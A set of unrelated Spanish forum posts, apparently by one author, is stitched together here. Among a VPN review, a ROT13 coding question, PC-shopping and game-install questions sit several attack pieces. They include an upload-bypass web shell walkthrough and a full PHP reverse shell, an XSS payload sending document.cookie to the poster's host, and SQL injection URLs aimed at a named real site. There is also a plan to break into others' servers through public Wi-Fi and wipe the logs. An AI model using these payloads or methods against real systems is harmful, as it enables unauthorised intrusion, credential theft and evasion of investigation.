Hacía mucho que no escribia nada (tanto que hasta olvide mi contraseña) y quería presentaros una herramienta, la cual considero realmente útil, barata y a estas alturas indispensable para cualquier persona que aprecie su privacidad. La herramienta en cuestión se llama proxy.sh, al contrario de lo que pueda parecer por su nombre proxy.sh es un sistema de servidores VPN que ofrece una serie de servicios por los cuales destaca.

En primer lugar proxy.sh tiene una política de privacidad extremadamente buena, en sus servidores sólo se almacena el correo electrónico que se les de durante el registro, esto quiere decir que no quedan registradas direcciones IP al conectarse a los servidores VPN ni al realizar el registro en su web, lo cual es un punto a favor, el único registro posible en el que puede aparecer la dirección IP es en el registro correspondiente al pago de sus mensualidades, el cual se realiza a traves de un tercero, y puede ser este tercero el que almacene tus datos.

En cuanto a la disposición de los pocos datos tuyos que tengan a terceros proxy.sh lo dice muy claro: "Usually we will not respond to demands from any third party, including governmental institutions". Sin embargo si que es cierto que realizan tres restricciones a esta regla, tus datos serán facilitados a terceros en caso de que estes acusado de pedofilia, daños a terceros y extremismos políticos o religiosos. Cabe destacar a estas alturas que a pesar de que todos los programas que hay en los servidores estan configurados para no dejar logs, ademas, estos corren en RAM con lo cual cada vez que se reinicia el servidor se pierden los posibles datos. (Si si en daños a terceros se incluye hacking, de echo hace poco hubo una noticia relaccionada con ellos que se puede leer en THN).

Cabe destacar de esta VPN que tiene su base en las islas Seychelles con lo cual como entidad jurídica no se ve sujeta a leyes tales como el acta patriótica que nos aleja un poco de las posibles interferencias de nuestras comunicaciones por parte de los EEUU (para los mas paranoicos).

Proxy.sh usa un sistema de cifrado RSA de 1024bits cuya contraseña cambia cada hora, como se puede leer en su página web en un sistema basado en OpenVPN-TCP:
 "For encryption the cipher in use is CBC mode of Blowfish with encryption strength of 128bit, hash algorithm is 160bit SHA1, and the control channel is same TLSv1/SSLv3 DHE-RSA-AES256-SHA, 1024 bit RSA. Our 1024 bit RSA key is changing every hour, preventing most advanced hackers and covert teams part of governmental agencies from breaking through."

En definitiva para mi proxy.sh es una opción realmente buena y eficiente si lo que queremos es anonimizar nuestro acceso a internet ya que protege bastante mas que un proxy y de momento no depende de otros usuarios como la red TOR para garantizar el anonimato, evitando que usuarios malintencionados puedan realiazar un robo de información. Ofrece múltiples servidores y una web donde se puede ver en tiempo real el estado de los servidores y un mapa en el cual se puede observar la localización de los mismos. En cuanto al funcionamiento de la VPN no tiene ninguna novedad, funciona igual que el resto de VPNs.




En lo referente a los pagos para todos los que somos de la península es cierto que la tarifa mas barata es la de 10 dólares mensuales que ofrece un ancho de banda de hasta 200Gbps pero haciendo el cambio a euros es aproximadamente 7 euros con 40 centimos, un gasto bastante superfluo teniendo en cuenta los servicios que nos ofrece. Para toda la comunidad latinoamericana creo que pueden elegir la tarifa de 5 dolares mensuales que da, si no me equivoco, hasta 100Gbps de todos modos las diferencias entre las tarifas son mínimas y se pueden encontrar aquí, destacar tambien que soporta hasta 90 tipos de pagos.

Si hablamos de la configuración esta es realmente facil y dan soporte a multiples plataformas, entre las que podemos encontrar: linux, ios, android, blackberry, windows phone, apple, xbox 360, ps3, cisco, aix, oracle y dd-wrt. Aunque por supuesto para uso casero, en dispositivos fijos, siempre que tengamos soporte en el router para VPN lo mejor creo que es configurar nuestro ruter para que use VPN con lo que quedarian protegidos todos los sistemas conectados a esta red.

En especial recomiendo éste servicios para los usuarios de telefonía movil ya que protege los datos de posibles filtraciones en redes wifi públicas, es decir, si alguien intentase interceptar, por ejemplo con un man in the middle, el tráfico saliente de tu maquina se encontraría con un tráfico cifrado realmente dificl de descifrar. Tanto para android como para ios proxy.sh ofrece aplicaciones con las cuales se redireccionará el tráfico de tu movil hacia la VPN, ambas aplicaciones son realmente fáciles de configurar.

Por último decir que proxy.sh ofrece tutoriales y guías para configurar nuestros dispositivos de todas las maneras posibles, las diferentes guias se pueden encontrar en este enlace, en cuanto a las FAQs las podemos encontrar aquí además ofrecen un soporte a traves de un sistema de tickets que es realmente rápido y bastante amable, para contactar con ellos se puede acceder a este link.

Ademas proxy.sh ofrece la posibilidad de que establezcas alguno de sus servidores como nodo de salida de la red TOR lo cual incrementaria la anonimicidad de todas tus conexiones (ver manual aquí) o como nodo de entrada.

---

Preguntillas:

¿Que opinais sobre su política de privacidad?
¿Que opinais sobre las VPN, estoy en lo cierto y son la mejor manera de protegerse contra posibles mitm?
¿Combinariais VPN + TOR?¿Como nodo de salida o de entrada?
¿Que opinais del cifrado que ofrece proxy.sh?
¿Es realmente útil para el anonimato, o con PRISM estamos todos pringados?
¿Alguien ha encontrado algún otro servicio VPN con mejores prestaciones y menor o igual precio?

---

Ninguno de los enlaces anteriores debería de ser mi enlace de afiliado, si te ha gustado el producto, crees que es de utilidad y vas a contratar sus servicios puedes echarme una mano usando mi enlace de afiliado.

Articulo publicado siguiendo las normas estipuladas en CAREN v1.0.

Un saludo,
Søra.

Hola a todos,
bueno lo primero localizamos el sistema con la siguiente dork
Buscamos la raiz por ejemplo:
Nos registramos y marcamos las tres casillas de ROL:
reader, author and reviewer...
creamos un artículo nuevo y usamos el uploader que hay para subir una portada para
nuestro articulo con extension pHp para bypassear el uploader o bien usamos live http headers
vamos a /public/journals/1/ y alli encontraremos nuestra shellcode renombrada a algo como:
cover_article_47_en_US.pHp
Voila!

PD: hasta la version 2.3.6 se puede hacer el upload con un submission en vez de con una portada, sinembargo esta suele estar parcheada.

https://www.htbridge.com/advisory/HTB23079

Buenas a todos, como indica el título estoy teniendo bastantes problemas a la hora de desarrollar un pequeño cifrador de texto en ROOT13, no son errores sintácticos ya que el compilador no em dice nada asi que supongo que son errores lógicos a ver si alguien me puede echar un cable.

import java.util.Scanner;
 
public class ArraysFor {
 
	public static void main(String[] args) {
 
		char[] abecedario={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','ñ','o','p','q','r','s','t','u','v','w','x','y','z'};
		System.out.println("Introduce el numero de caracteres a cifrar en ROOT13");
		Scanner scann = new Scanner (System.in);
		int maximo = scann.nextInt();
		char letra[];
		letra = new char[maximo];
 
		for (int k=0; k<maximo; k++) {
 
			letra[k] = scann.next().charAt(0);
 
		}
 
		for (int i=0; i<maximo; i++) {
 
			for (int j=0; j<27; j++) {
 
				if (letra[i] == abecedario[j]) {
 
					int x=0;
					x = j + 13;
 
					    if (x>27) {
 
					    	x = x - 27; 
 
						    letra[i]=abecedario[x]; }
 
					    else {
 
						    letra[i]=abecedario[x]; }
 
                } 
			}
		}
 
		for (int g=0; g<maximo; g++){
			System.out.println(letra[g]);
		}
	}
 
}

Bueno ese es el código lo que queria era cifrar los caracteres de manera que pasaran a ser los que se encuentran 13 posiciones mas a la derecha en el abecedario pero como se puede comprobar cuando ejecutamos el programa no todos los caracteres quedan bien cifdrados, lo raro es que para mi sorpresa hay algunos que si.

Un saludo y espero su ayuda.

Supongamos que yo quisiera hacer un hipotético ataque hacia un hipotético servidor que hipotéticamente hablando no sea mio (digamos que ha sido un prefacio exculpatorio). Y mi objetivo como no es pasar desapercibido coger la información e irme o simplemente controlar el servidor, mi pregunta es: ¿El método que desarrollaré a continuación es completamente anónimo?

1- Salgo de mi casa, me acerco a un McDonald, me siento en un bar cercano pido una Coca-Cola. Me conecto a la red del McDonald y procedo.

2- Enciendo ettercap y wireshark miro quién está conectado y observo que todas las conexiones sean completamente normales.

3- Saco la contraseña del router, la cual confío sea por defecto para no tener que usar fuerza bruta, y accedo a la puerta de enlace del router.

4- Cambio la configuración para que deje de registrar "eventos" y borro los registrados hasta ahora.

5- Con ayuda de TOR y proxychains anonimizo mis probatinas y finalmente si todo va bien la intrusión.

6- Accedo al servidor y posteriormente intento conseguir una terminal con permisos de administrador, mediante explotación del kernel u otros, ahora hay dos opciones:

6.1- Si la consigo accedo a los logs y borro toda mi información, programo un script de autoborrado de logs o simplemente lo hago yo manualmente, ahora ya puedo acceder desde mi casa con total confianza y seguridad ya que los logs pueden ser borrados.

6.2- Si no consigo la cuenta de administrador mantengo el mismo método cada vez que quiera acceder a este servidor o bien envío la información a través de otro servidor al que haya accedido con anterioridad y tenga permisos de administrador.

Bueno creo que el método es 100% seguro y que ni siquiera haría falta usar TOR si estas desde un McDonald pero en el hipotético caso de que existiera intención de encontrarme o no hubiera borrado bien todos los logs tendrían que pedir los hipotéticos interesados una orden judicial lo que me daría más tiempo.

Si añado ademas que el sistema operativo(BackTrack) con todos los datos están en un pendrive por mayor seguridad queda precioso.

Al principio esto iba a ser un artículo solo de pregunta pero me he dado cuenta que con un par de enlaces quizás podía ayudar a alguien así que espero que os sirva y si me he liado en algo decírmelo sin preocupaciones.

Un saludo Mr. Paranoias digo.... Sora

Haber gentecilla hace ya mucho que no me pasaba por aqui y ahora tengo muchas dudas y no se como solucionarlas a ve si alguien me echa una mano...

PRIMERO:

Estoy llevando un pentest hacia una web y he encontrado un uploader sin filtros he subido una shell modificada para tener un aspecto mas amigable pero no he encontrado la ruta donde se envian los archivos, en mi busqueda he encontrado tambien una FPD(Full Path Disclosure) pero obvio que no muestra la ruta de la shell, tambien he encontrado una SQL injection pero tampoco me vale para nada ya que no hay ni siquiera un panel de contenidos, no al total del servidor.

SEGUNDA:

Realizando otro pentest he encontrado una XSS no persistente os paso la inyeccion a ver si lo hago bien esque es la primera que hago :S el buscador no tiene filtros ni nada y al realizar una busqueda aparece:

<li><span class="totalpaginas">Resultados para mibusqueda</span></li>

y la url queda asi:

http://www.idomain.com/buscador/results?title=mibusqueda

Asi que la url que e preparado es esta:

www.idomain.com/buscador/results?title=</span></li><script>window.location=’http://miweb/ckie.php=’+document.cookie</script>

supongo que bastante simple no? pero bueno am y tengo otra duda respecto a esto necesitaria luego redireccionar al administrador a la web que quiera eso en JS como se haria?

TERCERO:

Tengo una shell inversa en php con este programa:

<?php
 
/*********************
 
@@author : lionaneesh
@@facebook : facebook.com/lionaneesh
@@Email : lionaneesh@gmail.com
 
********************/
 
 
ini_set('max_execution_time',0);
 
?>
 
<html>
<head>
    <title>Back Connect Shell -- PHP</title>
</head>
 
<body>
 
<h1>Welcome to Back Connect Control Panel </h1>
 
<p> Fill in the form Below to Start the Back Connect Service </p>
 
<?php
if( isset($_GET['port']) &&
    isset($_GET['ip']) &&
    $_GET['port'] != "" &&
    $_GET['ip'] != ""
    )
    {
        echo "<p>The Program is now trying to connect!</p>";
        $ip = $_GET['ip'];
        $port=$_GET['port'];
        $sockfd=fsockopen($ip , $port , $errno, $errstr );
        if($errno != 0)
        {
            echo "<font color='red'><b>$errno</b> : $errstr</font>";
        }
        else if (!$sockfd)
        {
               $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
        }
        else
        {
            fputs ($sockfd ,
            "\n=================================================================\n
            Back Connect in PHP\n
            Coded by lionaneesh\n
            @@author : lionaneesh
            @@facebook : facebook.com/lionaneesh
            @@Email : lionaneesh@gmail.com
            \n=================================================================");
         $pwd = shell_exec("pwd");
         $sysinfo = shell_exec("uname -a");
         $id = shell_exec("id");
         $dateAndTime = shell_exec("time /t & date /T");
         $len = 1337;
         fputs($sockfd ,$sysinfo . "\n" );
         fputs($sockfd ,$pwd . "\n" );
         fputs($sockfd ,$id ."\n\n" );
         fputs($sockfd ,$dateAndTime."\n\n" );
         while(!feof($sockfd))
         { 
            $cmdPrompt ="(Shell)[$]> ";
            fputs ($sockfd , $cmdPrompt );
            $command= fgets($sockfd, $len);
            fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
         }
         fclose($sockfd);
        }
    }
    else
    {
    ?>
    <table align="center" >
         <form method="GET">
         <td>
            <table style="border-spacing: 6px;">
                <tr>
                    <td>Port</td>
                    <td>
                        <input style="width: 200px;" name="port" value="31337" />
                    </td>
                </tr>
                <tr>
                    <td>IP </td>
                    <td><input style="width: 100px;" name="ip" size='5' value="127.0.0.1"/>
                </tr>
                <tr>
                <td>
                <input style="width: 90px;" class="own" type="submit" value="Connect back :D!"/>
                </td>
                </tr>   
 
            </table>
         </td>
         </form>
    </tr>
    </table>
    <p align="center" style="color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
<?php
    }
?>

El problema es que a pesar de el uso de varios exploits para intentar escalar privilegios no consigo la shell de root la maquina es ubuntu y el kernel:

2.6.28.8-20120119a-iscsi-ntacker-3ware-amd-sec8-ram64-grsec

bueno a pesar de la busqueda exahustiva por google no consigo nada asiqeu a ver si me podeis echar una manita un saludo chicos!!!!

Hola a todos estoy probando las SQLi  ya que no lo habia echo nunca y tengo una duda he encontrado una pagina vulnerable y ya e sacado el numero de columnas la que es vulnerable pero al pedir la lista de tablas no consigo que me la de entera, siempre me corta la lista, he probado concat(table_name), group_concat(table_name) he probado con limites peor nose... alguna idea?

Esta es la url que e probado:

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201000--

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201000--

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables--

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables--

Un saludo

Hola amigos me pase por aqui a ver si me podian solucionar una duda que me ha surgido..
veran estoy prbando  la web de un amigo y para su desgracia e encontrado esto:

..../descargar.php?=/var/www/.... he probado y efectivamente tengo acceso hasta la raiz del servidor.. eso si a la carpeta root nada de nada.. he encontrado la contraseña del phpmyadmin y he descargado el archivo qe la contiene ahora bien no consigo localizar el phpmyadmin para loguearme, he usado un bruteador de directorios como el intellitamper pero nada de nada voy completamente a ciegas.. ustedes que em recomiendan...

Un saludo

Ola a todos voy a comprarme un ordenador de sobremesa nuevo y no se que comprar que so parece esto:


http://www.appinformatica.com/ordenadores-marca-pbell.-imedia-i4620-sp-ci3-2100-6gb-1tb-nvidia-1gb.php

Pantalla:

http://www.appinformatica.com/monitores-lg.-e2441v-24--5000000-1-5ms--dvi-hdmi-wide.php

Espero sus opiniones y recomendaciones...

Ola a todos nunca me habia interesado por el tipo de ataque SQLi pero hacia mucho que no trataba con la informatica y e decidido empezar por ahi esta vez. He llegado a esto:

http://www.feldgrau.com/search.php?ID=1%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6+from+information_schema.tables--

Se que no se suele poner la pagina que de verdad estas atacando pero si no lo pongo no tiene sentido mi pregunta... mi pregunta es: ¿Que columna puede ser la que contenga los datos interesantes (contrasueña/nombre de usuario)?

He revisado varias de ellas y por ejemplo al poner:

.php?ID=1+and+1=0+union+all+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name=char(KEY_COLUMN_USAGE en ASCII)--

Me muestra que las columnas son KEY_COLUMN_USAGE repetidas veces y al pedir que me de el contenido de las columnas no pone nada...

No se si he usado la terminologia correcta, seguramente no pero espero que hayan entendido mi duda y alguien me pueda ayudar.

Perdon de nuevo por poner la url real pero esto es meramente didactico y espero no encontrarme la pagina defaceada!

Un saludo Søra

Hola a todos, antes de que piensen mal de mi es la 12ava vez que instalo el counter siguiendo manuales diferentes y lo he intentado todo pero visto lo visto e llegado a la conclusion de que igual el problema esta en ATI porque por lo que he leido con nVidea el counter no da problemas. La instalacion genial ni un solo problema instalo Steam descargo el Counter Strike Source y cuando ejecuto:




y ahi se queda calado sin hacer nada.. :S la aceleracion 3D se supone que si la tengo:


Si necesitais alguna otra informacion pedidla yo ya no se como hacer que funcione... uso Ubuntu 9.10 (karmic koala).

Espero vuestra ayuda!

PD: Tengo el WoW que si que me funciona y el Sparta-la batalla de las termopilas que tambien funciona..